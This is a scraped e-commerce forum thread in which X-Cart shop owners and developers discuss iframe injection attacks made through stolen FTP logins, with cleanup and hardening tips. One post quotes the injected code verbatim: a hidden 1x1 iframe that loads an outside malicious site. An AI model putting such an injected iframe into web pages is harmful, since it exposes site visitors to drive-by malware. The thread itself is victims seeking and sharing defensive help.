| ||||||||||
![]() |
Shopping cart software Solutions for online shops and malls | |||||||||
![]() |
![]() |
|
X-Cart Home | ![]() |
![]() |
![]() |
![]() |
![]() |
![]() |
Warning: Iframe based attacks using stolen FTP access info | ||||
![]() |
|
|
Thread Tools |
#231
|
|||||||||
|
|||||||||
![]() We haven't had an iFrame incident since this issue back in December. Was everything secured and updated on the server levels? Have you scanned the server and contacted those users that were infected and told them to update their software?
__________________
Conor Treacy - Big Red SEO - @bigredseo Search Engine Optimization & Internet Marketing - We Bring Your Website Out Of Hiding! If you can't be found on Google, Bing or Yahoo, you pretty much don't exist on the Internet. Omaha SEO Office with National & Local SEO Services Hourly Consulting - great for SEO Disaster Recovery, Audits and DIY Guidance |
|||||||||
#232
|
|||||||
|
|||||||
![]() I am somewhat hesitant to say my problem is solved but my hacker hasn't been back in a couple of months. I believe my hacker was gaining access through my shared server. I moved to hands-on and so far so good. Blue+cheap=hacked?
__________________
4.1.11 |
|||||||
#233
|
|||||||
|
|||||||
![]() Sorry to break the "silence" but our site was hacked (iframe) on 05/12/2009!
I have cleaned/replaced the index.php files, home.php files, etc. that have the line of code in them.. However, if you go into any page of the site (including admin pages) and click to view the source code.. the iframe link still exists <p /><iframe src="http://brugeni.net/?click=313114" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> I've read through this entire thread and if any one have any idea what's causing this? Please let me know. Thanks for your help! ![]()
__________________
Samz -------------------------------------- Heavily modified X-Cart Gold v4.1.10 |
|||||||
#234
|
|||||||
|
|||||||
![]() That means there is an iframe still in your code somewhere - you need to look through ALL of your files, as there are quite a number that are usually injected. Your host can help with this, as they have tools to scan your entire site quickly.
__________________
Padraic Ryan Ryan Design Studio Professional E-Commerce Development |
|||||||
|
#235
|
|||||||
|
|||||||
![]() Thanks for the reply. I have Hands-on doing a scan.. we'll see what the results are
Any thoughts on how to prevent another attack? Thanks
__________________
Samz -------------------------------------- Heavily modified X-Cart Gold v4.1.10 |
|||||||
#236
|
|||||||||
|
|||||||||
![]() Also clear your browser cache and run cleanup.php - you may be looking at files complied before you cleaned up.
Hands-on was very responsive when I got hit with this - so it is good you are there. They also helped me to correctly set up ftps, just in case insecure ftp has something to do with this attack.
__________________
X-CART (4.1.9,12/4.2.2-3/4.3.1-2/4.4.1-5)-Gold (CDSEO, Altered-Cart On Sale, BCSE Preorder Backorder, QuickOrder, X-Payments, BCSE DPM Module) |
|||||||||
#237
|
|||||||||
|
|||||||||
![]()
__________________
X-CART (4.1.9,12/4.2.2-3/4.3.1-2/4.4.1-5)-Gold (CDSEO, Altered-Cart On Sale, BCSE Preorder Backorder, QuickOrder, X-Payments, BCSE DPM Module) |
|||||||||
#238
|
|||||||||
|
|||||||||
![]() Also, I have seen Iframe attacks be encoded in HEX. So you may not be able to look for "iframe" per say in the templates.
It could be a bunch of Hex equivalent characters. Good luck! Thanks, Carrie
__________________
Custom Development, Custom Coding and Pre-built modules for X-cart since 2002! We support X-cart versions 3.x through 5.x! Home of the famous Authorize.net DPM & CIM Modules, Reward Points Module, Point of Sale module, Speed Booster modules and more! Over 200 X-cart Mods available & Thousands of Customizations Since 2002 - bcsengineering.com Please E-Mail us for questions/support! |
|||||||||
#239
|
|||||||||
|
|||||||||
![]() In recent days we've been seeing the HEX add too.. instaed of a regular iframe injection, there's document.write being used in the script portion and everything in there is encoded.
Makes it a little harder to SEE what's an issue, but the injections still appear to be going at the bottom of files, so they're still easy enough to spot.
__________________
Conor Treacy - Big Red SEO - @bigredseo Search Engine Optimization & Internet Marketing - We Bring Your Website Out Of Hiding! If you can't be found on Google, Bing or Yahoo, you pretty much don't exist on the Internet. Omaha SEO Office with National & Local SEO Services Hourly Consulting - great for SEO Disaster Recovery, Audits and DIY Guidance |
|||||||||
#240
|
|||||||
|
|||||||
![]() Are these recent attacks still going through FTP with the correct username and password?
__________________
v4.7.12 v5.4.x (In Dev) |
|||||||
|
|||
X-Cart forums © 2001-2020
|